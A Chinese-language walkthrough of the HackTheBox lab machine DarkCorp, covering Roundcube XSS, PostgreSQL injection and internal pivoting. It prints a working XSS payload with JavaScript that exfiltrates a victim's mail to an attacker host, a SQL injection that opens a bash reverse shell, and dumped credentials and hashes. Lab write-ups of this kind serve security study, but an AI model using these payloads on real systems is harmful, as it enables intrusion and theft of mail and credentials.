DarkCorp
1. User
1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb/Scepter]
└─# nmap 10.10.11.54 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-08 12:18 EDT
Nmap scan report for 10.10.11.54
Host is up (0.44s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
| 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open http syn-ack ttl 127 nginx 1.22.1
|_http-title: Site doesn''t have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
只有22,,80端口,有点意思
1.2. web
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# curl 10.10.11.54
<meta http-equiv="refresh" content="0; url=http://drip.htb/" />
配置一下hosts
这个是一个什么邮件系统,先注册一个账号登录
登录失败就配置一下hosts $IP mail.drip.htb
点击左下角的 about 按钮可以获取到相关信息
Roundcube Webmail 是一个免费且开源的,基于 Web 的 IMAP 电子邮件客户端。
你可以在 https://www.cvedetails.com/vendor/8905/ 这里获取到有关他的历史漏洞信息
我注意到他25年存在一个代码执行的漏洞,但这应该是一个非预期,我会在Beyond Root中进行演示如何利用此漏洞
在邮件中我们得知了一个用户的邮件地址
在网页下面有一个联系方式的表单,里面可以反馈信息
抓包可以发现其收件人还有内容类型是可以被更改的
我可以尝试给自己发一个邮件
我成功收到了来自自己的邮件,邮件内容有一些附带的安全提示“可能是钓鱼邮件”
且我得知了一个安全工程师的邮箱 bcase@drip.htb
1.2.1. CVE-2024-42009 ruoundcube XSS
Roundcube
在查看2024年的CVE中,我发现 CVE-2024-42009的exp已经被公开
漏洞描述:允许远程攻击者通过特制的电子邮件窃取和发送受害者的电子邮件,该电子邮件滥用
program/actions/mail/show.php中message_body()这个反清理函数
1.2.1.1. poc构造
漏洞的下方提供了一个poc
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar">
Foo
</body>
由于目标网站开启了httpOnly,所以我无法窃取到cookie
0xdf在他的wp中提供了一种很好的利用方式--加载外部js. 好处就是我们无需重复发包调整我们的payload,只需要修改script.js。然后重复查看邮件即可
var script = document.createElement('script');
script.src = 'http://10.10.14.86/script.js';
document.head.appendChild(script);
这里使用JS的内置函数atob()(ASCII to Binary)来避免格式错误的问题
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7')) foo=bar">
Foo
</body>
JS的内置函数
atob()(ASCII to Binary)用于解码Base64字符串
向我自己发送带有此payload的邮件
当我查看此邮件时,我发现请求了我的script.js文件
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:10] "GET /script.js HTTP/1.1" 200 -
现在已经可以加载我们的js了。下一步我需要让其加载恶意js文件利用
我注意到没封邮件都是有一个递增的uid,我可以尝试递归获取其他用户的的邮件内容
参考0xdf提供的payload。使用如下的script.js
for (let i = 1; i <= 15; i++) {
fetch(`http://mail.drip.htb/?_task=mail&_action=show&_uid=${i}&_mbox=INBOX&_extwin=1`, {mode: 'no-cors'})
.then((resp) => resp.text())
.then((text) => fetch(`http://10.10.14.86/?id=${i}&exfil=` + btoa(text))
)
}
然后使用下面的python脚本进行接收
from flask import Flask, request, send_file
import base64
import logging
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def index():
query_string = request.query_string.decode('utf-8')
mid = None
exfil = None
for param in query_string.split('&'):
if '=' in param:
key, value = param.split('=', 1)
if key == 'id':
mid = value
elif key == 'exfil':
exfil = value
decoded = base64.b64decode(exfil)
if not b'SERVER ERROR!' in decoded:
fn = f'bcase_{mid}.html'
with open(fn, 'wb') as f:
f.write(decoded)
print(f'Wrote email to {fn}')
return 'Request received'
@app.route('/script.js')
def serve_script():
try:
return send_file('script.js', mimetype='application/javascript')
except FileNotFoundError:
return 'File not found', 404
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=False)
ps: 你可以使用beef-xss 来进行XSS攻击
1.2.1.2. 邮件窃取
然后向管理员bcase@drip.htb发送带有恶意payloadD邮件
POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 392
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNjJiZDUzZTBjNDk5ZWYwYWZhYTc2NTlkOTkzNTA2NmZmNjgzNjQxZSJ9.aWsemA.GfmjmwXHe0ripuWdQ-SFt4MVw0s
Connection: keep-alive
name=123&email=123%40123.com&message=<body+title%3d"bgcolor%3dfoo"+name%3d"bar+style%3danimation-name%3aprogress-bar-stripes+onanimationstart%3deval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7'))+foo%3dbar">
++Foo
</body>&content=html&recipient=bcase@drip.htb
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python app.py
* Serving Flask app 'app'
* Debug mode: off
Wrote email to bcase_2.html
Wrote email to bcase_1.html
Wrote email to bcase_3.html
不一会,我收到了来自管理员邮件列表。他只有三封有效的邮件
其中有一篇有效,他提示存在一个 Analytics面板,地址为dev-a3f1-01.drip.htb
登录后重置密码,然后重复上面的操作,获取到更改密码的url
然后修改密码即可登录进来
1.3. sql注入
在页面中我可以进行查询,这里输入什么查询都会报错
根据报错意思可以得知是我输入的类型不对, 他需要一个字符串类型的, 而我输入的是一个数值类型
且开启了堆叠注入
'123';select version();
目标开启了一些安全机制,搬掉了一些高危语句,比如COPY
你可以参考 https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/PostgreSQL%20Injection/#table-dump-time-based 中的技巧进行绕过
'';DO $$ DECLARE cmd text; BEGIN cmd := CHR(67) || 'OPY (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'''; EXECUTE cmd; END $$;
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 192.168.10.14 • 192.168.1.3 • 172.18.0.1 • 172.17.0.1 • 10.10.14.86
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from drip~10.129.232.7-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/drip~10.129.232.7-Linux-x86_64/2026_01_18-04_17_59-336.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────
postgres@drip:/var/lib/postgresql/15/main$ whoami
postgres
postgres@drip:/var/lib/postgresql/15/main$
postgres@drip:/var/lib$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:84:03:02 brd ff:ff:ff:ff:ff:ff
inet 172.16.20.3/24 brd 172.16.20.255 scope global eth0
valid_lft forever preferred_lft forever
postgres@drip:/var/lib$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:55953 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:323 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:58666 [::]:*
udp UNCONN 0 0 [::1]:323 [::]:*
tcp LISTEN 0 5 127.0.0.1:34281 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:993 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8001 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=567,fd=5))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:143 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:587 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:32835 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
查看ip 我可以发现我当前处于一个容器当中,但考虑到我们的目标是一个windows,说明我们现在应该是处于一个虚拟机当中,而非docker
1.4. shell as VICTOR.R
1.4.1. pgsql
postgres=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+---------------+----------+-------------+-------------+------------+-----------------+---------------------------------
dripmail | dripmail_dba | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/dripmail_dba +
| | | | | | | dripmail_dba=CTc/dripmail_dba
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc |
roundcube | roundcubeuser | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/roundcubeuser +
| | | | | | | roundcubeuser=CTc/roundcubeuser
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
(5 rows)
postgres=# \c dripmail
You are now connected to database "dripmail" as user "postgres".
dripmail=# \dt
List of relations
Schema | Name | Type | Owner
--------+--------+-------+----------
public | Admins | table | postgres
public | Users | table | postgres
(2 rows)
dripmail=# select * from "Admins";
id | username | password | email
----+----------+----------------------------------+----------------
1 | bcase | 21232f297a57a5a743894a0e4a801fc3 | bcase@drip.htb
(1 row)
dripmail=# select * from "Users";
id | username | password | email | host_header | ip_address
------+----------+----------------------------------+-------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------
5001 | support | d9b9ecbf29db8054b21f303072b37c4e | support@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5002 | bcase | 1eace53df87b9a15a37fdc11da2d298d | bcase@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5003 | ebelford | 0cebd84e066fd988e89083879e88c5f9 | ebelford@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5004 | admin | 4297f44b13955235245b2497399d7a93 | admin@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 | 172.16.20.1
(4 rows)
这里可以获取到好几个md5
21232f297a57a5a743894a0e4a801fc3
d9b9ecbf29db8054b21f303072b37c4e
1eace53df87b9a15a37fdc11da2d298d
0cebd84e066fd988e89083879e88c5f9
4297f44b13955235245b2497399d7a93
可以出来两用户, 但都是我自己设置的密码
1.4.2. 信息收集
postgres@drip:/tmp$ cat /etc/krb5.conf
[libdefaults]
default_realm = DARKCORP.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
DARKCORP.HTB = {
kdc = darkcorp.htb
admin_server = darkcorp.htb
}
[domain_realm]
postgres@drip:/var/lib/postgresql/.gnupg$ ps -ef |grep sss
root 342 1 0 Jan17 ? 00:00:00 /usr/sbin/sssd -i --logger=files
root 530 342 0 Jan17 ? 00:00:03 /usr/libexec/sssd/sssd_be --domain darkcorp.htb --uid 0 --gid 0 --logger=files
root 583 342 0 Jan17 ? 00:00:04 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 584 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 585 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
postgres 189795 149967 0 05:16 pts/3 00:00:00 grep sss
机器配置了 krb5.conf 且存在SSSD说明他是一台加了域的linux, 可能是freeIPA
postgres@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False
# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development
# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>
# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets
# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
>>>> DB_USERNAME=dripmail_dba
>>>> DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432
SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'
在/var/www/html/dashboard/.env中可以获取到数据库密码,但因为我们当前是postgres用户,加上Peer/Ident 认证机制 ,我们可以不用密码使用 psql 命令连接到数据库
postgres@drip:/var/www/html/dashboard$ cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
>>>> bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres@drip:/var/www/html/dashboard$ ls /home
bcase ebelford vmail
postgres@drip:/var/www/html/dashboard$ ls /home/ -l
total 12
>>>> drwx------ 7 bcase bcase 4096 Feb 3 2025 bcase
drwxr-xr-x 2 ebelford ebelford 4096 Feb 5 2025 ebelford
drwxr-xr-x 2 vmail vmail 4096 Dec 19 2024 vmail
1.4.3. 内网探测
由于没有太多有价值的内容,我怀疑这台机器可能只是给我们当跳板用的。
我上传了nmap对内网进行主机探测
postgres@drip:/tmp$ ./nmap -sn 172.16.20.3/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:23 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0097s latency).
Nmap scan report for 172.16.20.2
Host is up (0.017s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3)
Host is up (0.0059s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.92 seconds
发现了3台机器,
DC-01 (172.16.20.1)
web-01 172.16.20.2
drip.darkcorp.htb (172.16.20.3) 当前机器
postgres@drip:/tmp$ ./nmap 172.16.20.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.20.2
Host is up (0.00054s latency).
Not shown: 1152 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
postgres@drip:/tmp$ ./nmap 172.16.20.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0015s latency).
Not shown: 1144 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
postgres@drip:/tmp$
这里我上传了fscan再进行了一遍扫描,主要是为了测试一下是否存在弱口令(感觉这种还是fscan比较好用)
postgres@drip:/tmp$ ./fscan-eAbbRdOo -h 172.16.20.2/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.16.20.1 is alive
(icmp) Target 172.16.20.3 is alive
(icmp) Target 172.16.20.2 is alive
[*] Icmp alive hosts len is: 3
172.16.20.2:445 open
172.16.20.2:139 open
172.16.20.2:135 open
172.16.20.2:80 open
172.16.20.1:445 open
172.16.20.1:443 open
172.16.20.1:139 open
172.16.20.1:135 open
172.16.20.1:80 open
172.16.20.1:22 open
172.16.20.3:22 open
172.16.20.1:88 open
172.16.20.3:80 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.16.20.1 code:200 len:64 title:None
[*] WebTitle http://172.16.20.3 code:200 len:64 title:None
[*] NetInfo
[*]172.16.20.2
[->]WEB-01
[->]172.16.20.2
[*] NetInfo
[*]172.16.20.1
[->]DC-01
[->]10.129.232.7
[->]172.16.20.1
[*] NetBios 172.16.20.2 DARKCORP\WEB-01
[*] NetBios 172.16.20.1 [+] DC:DARKCORP\DC-01
[*] WebTitle https://172.16.20.1 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.16.20.2 code:200 len:703 title:IIS Windows Server
已完成 11/13 [-] ssh 172.16.20.3:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 11/13 [-] ssh 172.16.20.1:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
fscan并没有发现有服务存在弱口令
1.4.4. 内网代理
使用ligolo-ng 进行内网代理
postgres@drip:/tmp$ ./agent-AVElfFOs -connect 10.10.14.86:11601 -ignore-cert &
[1] 192953
postgres@drip:/tmp$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.86:11601"
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0005] Agent joined. id=00155d840302 name=postgres@drip remote="10.129.232.7:54378"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - postgres@drip - 10.129.232.7:54378 - 00155d840302
[Agent : postgres@drip] » interface_create --name drip
INFO[0023] Creating a new drip interface...
INFO[0023] Interface created!
[Agent : postgres@drip] » tunnel_start --tun drip
INFO[0048] Starting tunnel to postgres@drip (00155d840302)
[Agent : postgres@drip] » interface_add_route --name drip --route 172.16.20.3/24
INFO[0067] Route created.
[Agent : postgres@drip] »
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
^C
--- 172.16.20.1 ping statistics ---
22 packets transmitted, 0 received, 100% packet loss, time 21499ms
─(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -p 80,445,135,3389 -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:58 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (0.28s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
配置好后,但受制于postgres用户的权限较低,我无法ping通,但是可以正常访问内网
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 08:01 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (3.2s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5000/tcp open upnp
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
5000端口是一个默认的登录框
我测试了一下数据库的凭据,无法登录。 这看起来是一个HTTP Basic认证,但结合实际环境我更偏向于这是一个NTLM / Negotiate认证
1.4.5. pgsql backups via GPGdecrypt
我发现了很多备份文件
postgres@drip:/var/log/postgresql$ ls
postgresql-15-main.log postgresql-15-main.log.2.gz postgresql-15-main.log.5.gz postgresql-15-main.log.8.gz
postgresql-15-main.log.1 postgresql-15-main.log.3.gz postgresql-15-main.log.6.gz postgresql-15-main.log.9.gz
postgresql-15-main.log.10.gz postgresql-15-main.log.4.gz postgresql-15-main.log.7.gz
其中可以获取到ebelford的hash
postgres@drip:/var/log/postgresql$ zcat *.gz | grep ebelford
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT: UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
解出明文密码为ThePlague61780
可以ssh登录到ebelford用户
┌──(root㉿kali)-[/usr/share/responder]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
64 bytes from 172.16.20.1: icmp_seq=1 ttl=64 time=313 ms
64 bytes from 172.16.20.1: icmp_seq=2 ttl=64 time=267 ms
64 bytes from 172.16.20.1: icmp_seq=3 ttl=64 time=185 ms
64 bytes from 172.16.20.1: icmp_seq=4 ttl=64 time=187 ms
64 bytes from 172.16.20.1: icmp_seq=5 ttl=64 time=278 ms
^C
--- 172.16.20.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 185.184/245.832/312.658/51.272 ms
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders
(limit 70)
-rwxr--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-mLZiKDMy.sh
-rwxr--r-- 1 postgres postgres 7100304 Jan 18 05:27 /tmp/fscan-eAbbRdOo
-rwxr--r-- 1 postgres postgres 5944464 Jan 18 05:21 /tmp/nmap
-rw------- 1 postgres postgres 835 Jan 18 05:31 /tmp/result.txt
-rw-r--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-IfofOSGC.sh
-rwxr--r-- 1 postgres postgres 6475928 Jan 18 05:29 /tmp/agent-AVElfFOs
-rw-r--r-- 1 root root 6028 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_progress.bc
-rw-r--r-- 1 root root 4704 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_throttle.bc
-rw-r--r-- 1 root root 19068 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_copy.bc
-rw-r--r-- 1 root root 8320 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_lz4.bc
-rw-r--r-- 1 root root 3668 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_sink.bc
-rw-r--r-- 1 root root 7576 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_target.bc
-rw-r--r-- 1 root root 9048 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_zstd.bc
-rw-r--r-- 1 root root 13456 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/backup_manifest.bc
-rw-r--r-- 1 root root 9912 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_server.bc
-rw-r--r-- 1 root root 44976 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup.bc
-rw-r--r-- 1 root root 7888 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_gzip.bc
-rw-r--r-- 1 root root 5714 Jan 2 2025 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 2229 Dec 19 2024 /var/backups/alternatives.tar.5.gz
>>>> -rw-r--r-- 1 postgres postgres 1784 Feb 5 2025 /var/backups/postgres/dev-dripmail.old.sql.gpg
-rw-r--r-- 1 root root 32 Dec 24 2024 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 5711 Jan 6 2025 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 5714 Jan 1 2025 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 32 Dec 20 2024 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 32 Dec 19 2024 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 81920 Jan 18 00:00 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 0 Jan 18 00:00 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 32 Jan 1 2025 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 5710 Dec 24 2024 /var/backups/alternatives.tar.4.gz
使用linPEAS检测,我发现存在/var/backups/postgres/dev-dripmail.old.sql.gpg
它是一个用GPG加密的旧版dev-dripmail 数据库备份文件,且我们当前用户postgres可以读取的,
由于我们之前获取到了pg数据库密码为2Qa2SsBkQvsc
我可以尝试使用此密码对它进行解密(这里需要先引入环境变量,使其能够正常弹出密码输入框)
postgres@drip:export TERM=xterm
postgres@drip:/var/backups/postgres$ gpg --batch -d dev-dripmail.old.sql.gpg
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <postgres@drip.darkcorp.htb>"
--
-- PostgreSQL database dump
--
-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)
SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
